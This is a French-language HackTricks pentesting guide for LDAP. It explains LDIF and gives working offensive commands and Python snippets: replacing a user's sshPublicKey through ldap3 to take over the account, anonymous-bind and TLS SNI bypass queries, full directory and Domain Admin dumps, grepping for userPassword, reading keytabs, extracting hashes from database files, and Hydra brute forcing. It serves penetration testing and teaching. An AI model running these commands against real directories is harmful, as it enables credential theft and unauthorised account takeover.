18 KiB
389, 636, 3268, 3269 - Pentesting LDAP
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!
Autres façons de soutenir HackTricks:
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le swag officiel PEASS & HackTricks
- Découvrez La famille PEASS, notre collection exclusive de NFTs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud dépôts GitHub.
L'utilisation de LDAP (Lightweight Directory Access Protocol) est principalement pour localiser diverses entités telles que des organisations, des individus et des ressources telles que des fichiers et des appareils au sein de réseaux, publics et privés. Il offre une approche simplifiée par rapport à son prédécesseur, DAP, en ayant une empreinte de code plus petite.
Les répertoires LDAP sont structurés pour permettre leur distribution sur plusieurs serveurs, chaque serveur hébergeant une version répliquée et synchronisée du répertoire, appelée Agent de Système de Répertoire (DSA). La responsabilité de traiter les demandes incombe entièrement au serveur LDAP, qui peut communiquer avec d'autres DSAs au besoin pour fournir une réponse unifiée au demandeur.
L'organisation du répertoire LDAP ressemble à une hiérarchie arborescente, commençant par le répertoire racine en haut. Cela se divise en pays, qui se divisent ensuite en organisations, puis en unités organisationnelles représentant diverses divisions ou départements, atteignant enfin le niveau des entités individuelles, comprenant à la fois des personnes et des ressources partagées telles que des fichiers et des imprimantes.
Port par défaut : 389 et 636 (ldaps). Le catalogue global (LDAP dans ActiveDirectory) est disponible par défaut sur les ports 3268 et 3269 pour LDAPS.
PORT STATE SERVICE REASON
389/tcp open ldap syn-ack
636/tcp open tcpwrapped
Format d'interchange de données LDAP
LDIF (LDAP Data Interchange Format) définit le contenu de l'annuaire sous forme d'un ensemble d'enregistrements. Il peut également représenter des demandes de mise à jour (Ajouter, Modifier, Supprimer, Renommer).
dn: dc=local
dc: local
objectClass: dcObject
dn: dc=moneycorp,dc=local
dc: moneycorp
objectClass: dcObject
objectClass: organization
dn ou=it,dc=moneycorp,dc=local
objectClass: organizationalUnit
ou: dev
dn: ou=marketing,dc=moneycorp,dc=local
objectClass: organizationalUnit
Ou: sales
dn: cn= ,ou= ,dc=moneycorp,dc=local
objectClass: personalData
cn:
sn:
gn:
uid:
ou:
mail: pepe@hacktricks.xyz
phone: 23627387495
- Les lignes 1-3 définissent le domaine de premier niveau local
- Les lignes 5-8 définissent le domaine de premier niveau moneycorp (moneycorp.local)
- Les lignes 10-16 définissent 2 unités organisationnelles : dev et sales
- Les lignes 18-26 créent un objet du domaine et attribuent des attributs avec des valeurs
Écrire des données
Notez que si vous pouvez modifier les valeurs, vous pourriez être capable d'effectuer des actions vraiment intéressantes. Par exemple, imaginez que vous puissiez changer les informations "sshPublicKey" de votre utilisateur ou de tout utilisateur. Il est très probable que si cet attribut existe, alors ssh lit les clés publiques à partir de LDAP. Si vous pouvez modifier la clé publique d'un utilisateur, vous pourrez vous connecter en tant que cet utilisateur même si l'authentification par mot de passe n'est pas activée dans ssh.
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
Capturer les identifiants en clair
Si LDAP est utilisé sans SSL, vous pouvez capturer les identifiants en clair dans le réseau.
De plus, vous pouvez effectuer une attaque MITM dans le réseau entre le serveur LDAP et le client. Ici, vous pouvez effectuer une attaque de rétrogradation afin que le client utilise les identifiants en clair pour se connecter.
Si SSL est utilisé, vous pouvez essayer de faire une MITM comme mentionné ci-dessus, mais en proposant un faux certificat, si l'utilisateur l'accepte, vous pouvez rétrograder la méthode d'authentification et voir à nouveau les identifiants.
Accès anonyme
Contourner la vérification TLS SNI
Selon cet article, en accédant simplement au serveur LDAP avec un nom de domaine arbitraire (comme company.com), il a pu contacter le service LDAP et extraire des informations en tant qu'utilisateur anonyme:
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
Connexions anonymes LDAP
Les connexions anonymes LDAP permettent aux attaquants non authentifiés de récupérer des informations du domaine, telles qu'une liste complète des utilisateurs, des groupes, des ordinateurs, des attributs de compte utilisateur et la politique de mot de passe du domaine. Il s'agit d'une configuration héritée, et à partir de Windows Server 2003, seuls les utilisateurs authentifiés sont autorisés à initier des requêtes LDAP.
Cependant, les administrateurs peuvent avoir eu besoin de configurer une application particulière pour autoriser les connexions anonymes et accordé plus d'accès que prévu, donnant ainsi aux utilisateurs non authentifiés un accès à tous les objets dans AD.
Identifiants Validés
Si vous disposez d'identifiants valides pour vous connecter au serveur LDAP, vous pouvez extraire toutes les informations sur l'administrateur de domaine en utilisant :
pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
Brute Force
Énumération
Automatisé
En utilisant ceci, vous pourrez voir les informations publiques (comme le nom de domaine):
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
Python
Voir l'énumération LDAP avec python
Vous pouvez essayer d'énumérer un LDAP avec ou sans identifiants en utilisant python: pip3 install ldap3
Essayez d'abord de vous connecter sans identifiants:
>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
True
>>> server.info
Si la réponse est True
comme dans l'exemple précédent, vous pouvez obtenir certaines données intéressantes du serveur LDAP (comme le contexte de nommage ou le nom de domaine) à partir de :
>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3
Naming contexts:
dc=DOMAIN,dc=DOMAIN
Une fois que vous avez le contexte de nommage, vous pouvez effectuer des requêtes plus intéressantes. Cette requête simple devrait vous montrer tous les objets dans l'annuaire :
>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
>> connection.entries
Ou dump l'ensemble de l'annuaire LDAP :
>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
True
>>> connection.entries
windapsearch
Windapsearch est un script Python utile pour énumérer les utilisateurs, les groupes et les ordinateurs d'un domaine Windows en utilisant des requêtes LDAP.
# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users
ldapsearch
Vérifiez les informations d'identification nulles ou si vos informations d'identification sont valides :
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839
Si vous trouvez quelque chose indiquant que le "bind doit être complété", cela signifie que les informations d'identification sont incorrectes.
Vous pouvez extraire tout d'un domaine en utilisant :
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given
Extraire utilisateurs :
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
Extraire ordinateurs :
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
Extraire mes informations :
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
Extraire Domain Admins :
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
Extraire Utilisateurs du domaine :
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
Extraire Enterprise Admins :
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
Extraire Administrateurs :
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
Extraire Groupe Bureau à distance :
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
Pour vérifier si vous avez accès à un mot de passe, vous pouvez utiliser grep après avoir exécuté l'une des requêtes :
<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
pbis
Vous pouvez télécharger pbis à partir d'ici : https://github.com/BeyondTrust/pbis-open/ et il est généralement installé dans /opt/pbis
.
Pbis vous permet d'obtenir facilement des informations de base :
#Read keytab file
./klist -k /etc/krb5.keytab
#Get known domains info
./get-status
./lsa get-status
#Get basic metrics
./get-metrics
./lsa get-metrics
#Get users
./enum-users
./lsa enum-users
#Get groups
./enum-groups
./lsa enum-groups
#Get all kind of objects
./enum-objects
./lsa enum-objects
#Get groups of a user
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
echo "$line";
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
echo "======================"
done
Interface Graphique
Apache Directory
Téléchargez Apache Directory à partir d'ici. Vous pouvez trouver un exemple d'utilisation de cet outil ici.
jxplorer
Vous pouvez télécharger une interface graphique avec un serveur LDAP ici : http://www.jxplorer.org/downloads/users.html
Par défaut, il est installé dans : /opt/jxplorer
Godap
Vous pouvez y accéder à https://github.com/Macmod/godap
Authentification via kerberos
En utilisant ldapsearch
, vous pouvez vous authentifier contre kerberos au lieu de via NTLM en utilisant le paramètre -Y GSSAPI
POST
Si vous pouvez accéder aux fichiers où les bases de données sont contenues (pourrait être dans /var/lib/ldap). Vous pouvez extraire les hachages en utilisant :
cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
Fichiers de configuration
- Général
- containers.ldif
- ldap.cfg
- ldap.conf
- ldap.xml
- ldap-config.xml
- ldap-realm.xml
- slapd.conf
- Serveur IBM SecureWay V3
- V3.sas.oc
- Serveur Microsoft Active Directory
- msadClassesAttrs.ldif
- Serveur Netscape Directory Server 4
- nsslapd.sas_at.conf
- nsslapd.sas_oc.conf
- Serveur de répertoire OpenLDAP
- slapd.sas_at.conf
- slapd.sas_oc.conf
- Serveur Sun ONE Directory Server 5.1
- 75sas.ldif
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
Port_Number: 389,636 #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
https://book.hacktricks.xyz/pentesting/pentesting-ldap
Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}
Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x
Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts
Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"
Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks)!
Autres façons de soutenir HackTricks:
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
- Obtenez le swag officiel PEASS & HackTricks
- Découvrez La famille PEASS, notre collection exclusive de NFTs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud github repos.